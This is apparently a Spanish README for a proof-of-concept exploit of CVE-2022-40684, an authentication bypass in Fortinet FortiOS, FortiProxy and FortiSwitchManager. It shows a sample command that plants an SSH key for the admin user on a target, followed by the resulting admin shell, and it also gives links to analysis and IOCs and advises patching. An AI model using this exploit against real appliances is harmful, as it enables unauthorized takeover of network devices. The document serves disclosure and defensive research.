
Un exploit de prueba de concepto para CVE-2022-40684 que afecta a Fortinet FortiOS, FortiProxy y FortiSwitchManager
POC para CVE-2022-40684 que afecta a los appliances Fortinet FortiOS, FortiProxy y FortiSwitchManager.
Un análisis técnico de la causa raíz de la vulnerabilidad se puede encontrar en nuestro blog: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
Para analizar los registros de Fortinet en busca de indicadores de compromiso y cómo habilitar registros más profundos, consulte nuestro blog de IOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
Este POC abusa de la vulnerabilidad de omisión de autenticación para establecer una clave SSH para el usuario especificado.
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
Actualice a la última versión o mitigue siguiendo las instrucciones dentro del PSIRT de Fortinet
Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables ni se les considera responsables del mal uso del software. Úselo de manera responsable.